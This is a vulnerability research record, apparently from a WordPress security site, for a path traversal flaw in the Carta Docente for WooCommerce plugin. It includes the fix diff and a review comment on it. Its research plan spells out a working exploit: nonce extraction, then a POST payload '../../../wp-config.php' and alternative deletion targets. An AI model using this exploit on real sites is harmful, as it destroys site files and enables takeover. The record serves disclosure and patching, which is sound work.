[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f0DD9GAEZgDiJzcNNIlO4DiUarOnXFcicKx6mswEFkh8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-2421","ilghera-carta-docente-for-woocommerce-authenticated-administrator-path-traversal-to-arbitrary-file-deletion-via-cert-par","ilGhera Carta Docente for WooCommerce \u003C= 1.5.0 - Authenticated (Administrator+) Path Traversal to Arbitrary File Deletion via 'cert' Parameter","The ilGhera Carta Docente for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.5.0 via the 'cert' parameter of the 'wccd-delete-certificate' AJAX action. This is due to insufficient file path validation before performing a file deletion. 
This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, such as wp-config.php, which can make site takeover and remote code execution possible.","wc-carta-docente",null,"\u003C=1.5.0","1.5.1","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-03-19 20:03:09","2026-03-20 08:26:02",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7aab1307-7fb5-46fb-ae12-087dce3086fc?source=api-prod",1,[22,23,24],"includes\u002Fclass-wccd-admin.php","readme.txt","wc-carta-docente.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-2421 - Arbitrary File Deletion in ilGhera Carta Docente for WooCommerce\n\n## 1. Vulnerability Summary\nThe **ilGhera Carta Docente for WooCommerce** plugin (versions \u003C= 1.5.0) contains a path traversal vulnerability in its certificate deletion functionality. Specifically, the `delete_certificate_callback` function in `includes\u002Fclass-wccd-admin.php` takes a filename from the `cert` POST parameter and concatenates it with a base directory constant (`WCCD_PRIVATE`) before passing it directly to `unlink()`. \n\nWhile the input is passed through `sanitize_text_field()`, this WordPress function does not remove directory traversal sequences (e.g., `..\u002F`). An authenticated Administrator can exploit this to delete any file the PHP process has permission to remove, including the critical `wp-config.php` file.\n\n## 2. 
Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `wccd-delete-certificate`\n*   **Vulnerable Parameter:** `cert` (POST)\n*   **Required Parameters:**\n    *   `action`: `wccd-delete-certificate`\n    *   `wccd-delete`: (Any value, must be set)\n    *   `delete-nonce`: (Valid CSRF nonce for action `wccd-del-cert-nonce`)\n    *   `cert`: Path traversal payload (e.g., `..\u002F..\u002F..\u002Fwp-config.php`)\n*   **Authentication Level:** Administrator (`manage_options` capability is required to access the settings page where the nonce is generated, and the AJAX action is registered within the `WCCD_Admin` class).\n*   **Preconditions:** The plugin must be active. WooCommerce must be active.\n\n## 3. Code Flow\n1.  **Entry Point:** In `includes\u002Fclass-wccd-admin.php`, the `__construct()` method registers the AJAX action:\n    ```php\n    add_action( 'wp_ajax_wccd-delete-certificate', array( $this, 'delete_certificate_callback' ), 1 );\n    ```\n2.  **Logic Trigger:** The function `delete_certificate_callback()` is invoked.\n3.  **Nonce Check:** The code verifies a nonce named `wccd-del-cert-nonce` passed via `delete-nonce`:\n    ```php\n    if ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) {\n    ```\n4.  **Input Acquisition:** The `cert` parameter is retrieved:\n    ```php\n    $cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : '';\n    ```\n5.  **Vulnerable Sink:** If `$cert` is not empty, it is concatenated with `WCCD_PRIVATE` and deleted:\n    ```php\n    unlink( WCCD_PRIVATE . $cert );\n    ```\n6.  **Path Resolution:** `WCCD_PRIVATE` is defined in `wc-carta-docente.php` relative to the WordPress uploads directory: `wp-content\u002Fuploads\u002Fwccd-private\u002F`. Traversal starts here.\n\n## 4. 
Nonce Acquisition Strategy\nThe nonce is localized specifically for the plugin's settings page in the WordPress admin dashboard.\n\n1.  **Navigate to the Settings Page:** The plugin registers its settings page at `admin.php?page=wccd-settings` (as a submenu of `woocommerce`).\n2.  **Extracting the Nonce:** The nonce is passed to the frontend using `wp_localize_script()` in `wc-carta-docente.php`:\n    ```php\n    wp_localize_script(\n        'wccd-admin-scripts',\n        'wccdData',\n        array(\n            'delCertNonce' => $delete_nonce,\n            'addCatNonce'  => $add_cat_nonce,\n        )\n    );\n    ```\n3.  **Browser Execution:** \n    *   Use `browser_navigate` to go to `\u002Fwp-admin\u002Fadmin.php?page=wccd-settings`.\n    *   Use `browser_eval` to extract the nonce: `window.wccdData?.delCertNonce`.\n\n## 5. Exploitation Strategy\nThe goal is to delete `wp-config.php` to force WordPress into a setup state, or simply to demonstrate arbitrary file deletion.\n\n1.  **Setup User:** Create an Administrator user (if not already logged in).\n2.  **Get Nonce:** Follow the strategy in Section 4 to obtain a valid `delCertNonce`.\n3.  **Determine Traversal Depth:** \n    *   `WCCD_PRIVATE` is `wp-content\u002Fuploads\u002Fwccd-private\u002F`.\n    *   To reach root (where `wp-config.php` resides), the traversal is: `..\u002F..\u002F..\u002Fwp-config.php`.\n    *   `wccd-private\u002F` -> `..` -> `uploads\u002F` -> `..` -> `wp-content\u002F` -> `..` -> root.\n4.  **Send Exploitation Request:**\n    *   **Tool:** `http_request`\n    *   **Method:** POST\n    *   **URL:** `[TARGET_URL]\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Body (URL-encoded):**\n        ```\n        action=wccd-delete-certificate&wccd-delete=1&delete-nonce=[NONCE]&cert=..\u002F..\u002F..\u002Fwp-config.php\n        ```\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n\n## 6. Test Data Setup\n1.  
**Plugin Activation:** Ensure `wc-carta-docente` and `woocommerce` are installed and activated.\n2.  **Target File:** Ensure `wp-config.php` exists (standard for WP) or create a canary file for safer testing:\n    *   `wp eval \"file_put_contents(ABSPATH . 'canary.txt', 'pwned');\"`\n3.  **Traversal to Canary:** If using `canary.txt`, the `cert` parameter should be `..\u002F..\u002F..\u002Fcanary.txt`.\n\n## 7. Expected Results\n*   The AJAX request will likely return a `200 OK` or `0` (as it calls `exit;` immediately after processing).\n*   The target file (e.g., `wp-config.php` or `canary.txt`) will be removed from the server filesystem.\n*   If `wp-config.php` is deleted, navigating to the homepage will redirect to `wp-admin\u002Fsetup-config.php`.\n\n## 8. Verification Steps\n1.  **Check Filesystem:** Use WP-CLI to check if the file still exists.\n    *   `wp eval \"echo file_exists(ABSPATH . 'canary.txt') ? 'exists' : 'deleted';\"`\n    *   Or check `wp-config.php`: `ls \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-config.php` (if in a shell).\n2.  **Check Site State:** Attempt to access the site; a missing `wp-config.php` triggers the WordPress installation screen.\n\n## 9. Alternative Approaches\n*   **Deletion of .htaccess:** If `wp-config.php` is protected by filesystem permissions, try deleting `.htaccess` (`..\u002F..\u002F..\u002F.htaccess`) to break site routing.\n*   **Plugin Deletion:** Delete the main plugin file to disable security checks: `..\u002F..\u002Fwc-carta-docente.php`.\n*   **WCCD_PRIVATE Discovery:** If the standard traversal depth fails, it may be because the uploads folder is moved. Verify the constant value:\n    *   `wp eval \"echo WCCD_PRIVATE;\"` to confirm the starting directory.","The ilGhera Carta Docente for WooCommerce plugin is vulnerable to arbitrary file deletion due to a path traversal flaw in its certificate management logic. 
An authenticated Administrator can use directory traversal sequences like '..\u002F..\u002F' in the 'cert' parameter to delete critical server files such as wp-config.php, potentially leading to site takeover.","\u002F\u002F includes\u002Fclass-wccd-admin.php @ 1.5.0\n\t\u002F**\n\t * Cancella il certificato\n\t *\n\t * @return void\n\t *\u002F\n\tpublic function delete_certificate_callback() {\n\n\t\tif ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) {\n\n\t\t\t$cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : '';\n\n\t\t\tif ( $cert ) {\n\n\t\t\t\tunlink( WCCD_PRIVATE . $cert );\n\n\t\t\t}\n\t\t}\n\n\t\texit;\n\n\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Fincludes\u002Fclass-wccd-admin.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Fincludes\u002Fclass-wccd-admin.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Fincludes\u002Fclass-wccd-admin.php\t2026-02-04 10:12:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Fincludes\u002Fclass-wccd-admin.php\t2026-03-13 07:32:12.000000000 +0000\n@@ -81,11 +81,15 @@\n \n \t\tif ( isset( $_POST['wccd-delete'], $_POST['delete-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['delete-nonce'] ) ), 'wccd-del-cert-nonce' ) ) {\n \n-\t\t\t$cert = isset( $_POST['cert'] ) ? sanitize_text_field( wp_unslash( $_POST['cert'] ) ) : '';\n+\t\t\t$cert = isset( $_POST['cert'] ) ? sanitize_file_name( wp_unslash( $_POST['cert'] ) ) : '';\n \n \t\t\tif ( $cert ) {\n \n-\t\t\t\tunlink( WCCD_PRIVATE . $cert );\n+\t\t\t\t$file_path = realpath( WCCD_PRIVATE . 
$cert );\n+\n+\t\t\t\tif ( $file_path && 0 === strpos( $file_path, realpath( WCCD_PRIVATE ) ) ) {\n+\t\t\t\t\tunlink( $file_path );\n+\t\t\t\t}\n \n \t\t\t}\n \t\t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Freadme.txt \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Freadme.txt\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Freadme.txt\t2026-02-04 10:12:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Freadme.txt\t2026-03-13 07:32:12.000000000 +0000\n@@ -1,7 +1,7 @@\n === ilGhera Carta Docente for WooCommerce ===\n Contributors: ghera74\n Tags: WooCommerce, payment gateway, Carta Docente, Carte Cultura, 18app\n-Stable tag: 1.5.0\n+Stable tag: 1.5.1\n Requires at least: 4.0\n Tested up to: 6.9\n License: GPLv3\n@@ -76,6 +76,11 @@\n \n == Changelog ==\n \n+= 1.5.1 =\n+Data di rilascio: 13 Marzo, 2026\n+\n+    * Sicurezza: Corretto path traversal nella cancellazione certificato (CVE-2026-2421)\n+\n = 1.5.0 =\n Data di rilascio: 4 Febbraio, 2026\n \ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Fwc-carta-docente.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Fwc-carta-docente.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.0\u002Fwc-carta-docente.php\t2026-02-04 10:12:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-carta-docente\u002F1.5.1\u002Fwc-carta-docente.php\t2026-03-13 07:32:12.000000000 +0000\n@@ -6,8 +6,8 @@\n  * Author: ilGhera\n  *\n  * @package wc-carta-docente\n- * Version: 1.5.0\n- * Stable tag: 1.5.0\n+ * 
Version: 1.5.1\n+ * Stable tag: 1.5.1\n  * Author URI: https:\u002F\u002Filghera.com\n  * Requires at least: 4.0\n  * Tested up to: 6.9\n@@ -33,7 +33,7 @@\n \tdefine( 'WCCD_URI', plugin_dir_url( __FILE__ ) );\n \tdefine( 'WCCD_INCLUDES', WCCD_DIR . 'includes\u002F' );\n \tdefine( 'WCCD_INCLUDES_URI', WCCD_URI . 'includes\u002F' );\n-\tdefine( 'WCCD_VERSION', '1.5.0' );\n+\tdefine( 'WCCD_VERSION', '1.5.1' );\n \n \t\u002F*Main directory di upload*\u002F\n \t$wp_upload_dir = wp_upload_dir();","The exploit targets the 'wccd-delete-certificate' AJAX action. An authenticated Administrator first retrieves a valid CSRF nonce ('wccd-del-cert-nonce') from the plugin's settings page by accessing the localized 'wccdData' object in the browser. Using this nonce, the attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' set to 'wccd-delete-certificate' and the 'cert' parameter containing a directory traversal payload (e.g., '..\u002F..\u002F..\u002Fwp-config.php'). Because the plugin fails to validate that the resulting path is contained within the intended directory before calling unlink(), the targeted file is deleted from the filesystem.","gemini-3-flash-preview","2026-04-18 02:15:19","2026-04-18 02:15:40",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.5.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-carta-docente\u002Ftags\u002F1.5.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-carta-docente.1.5.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-carta-docente\u002Ftags\u002F1.5.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-carta-docente.1.5.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-carta-docente\u002Ftags"]
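Review bot: In the includes/class-wccd-admin.php hunk, the containment test `0 === strpos( $file_path, realpath( WCCD_PRIVATE ) )` is a bare string-prefix match. realpath() returns the base directory without a trailing separator, so a resolved path in a sibling directory whose name merely begins with the base directory's name would also satisfy it. Only the `sanitize_file_name()` call earlier in the same hunk, which strips path separators, keeps such input away from this check. Make the check self-sufficient by comparing against `trailingslashit( realpath( WCCD_PRIVATE ) )`, and resolve the base into a variable first so that a `false` return from realpath() is rejected explicitly. Separately, the `if` that guards the handler still relies on `wp_verify_nonce()` alone. Adding `current_user_can( 'manage_options' )` to that condition would tie the deletion to the capability itself, not to whoever can read the nonce.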